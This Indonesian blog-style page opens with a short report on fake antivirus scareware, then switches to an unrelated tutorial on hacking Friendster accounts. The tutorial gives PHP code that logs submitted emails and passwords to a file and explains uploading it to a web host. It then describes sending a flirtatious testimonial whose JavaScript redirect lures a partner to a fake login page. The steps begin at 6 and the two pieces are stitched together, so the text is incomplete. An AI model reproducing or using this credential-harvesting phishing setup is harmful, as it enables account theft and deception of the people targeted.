Antivirus Palsu Gentanyangan di Internet

by: soepardianto

Panda Security melaporkan adanya peningkatan untuk kelas Malware jenis Adware pada kuartal 3 lalu. Adware ternyata telah tercatat meningkat dan banyak menyerang komputer di Internet. Angkanya mencapai 31.05% adalah jenis Malware baru.

PandaLabs dalam laporan setiap kuartalnya melihat ada peningkatan dari tawaran antivirus palsu, dan melakukan penipuan dengan menawarkan versi software bayar.

Ciri dari antivirus palsu yang ditawarkan awalnya gratis, ketika bekerja akan memberikan peringatan palsu dan mengatakan komputer terserang virus. Bila ingin dibersihkan maka penguna komputer harus membeli versi bayar.

Penguna internet yang merasa perlu (tertipu) tentu akan membayar, padahal peringatan dari software Antivirus tersebut cuma akal-akalan si pembuatnya. Peringatan dari software Antivirus palsu sebenarnya memang palsu, bila user membayar tentunya akan tertipu karena didalam komputer sebenarnya memang tidak pernah terinfeksi oleh virus.

Untuk mendapatkan Antivirus yang free, bisa netter akses di http://worldofantivirus.blogspot.com/ dan Antispyware di http://worldofantispy.blogspot.com/

Cara MengHack Friendster

Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>



Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… =] :))

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!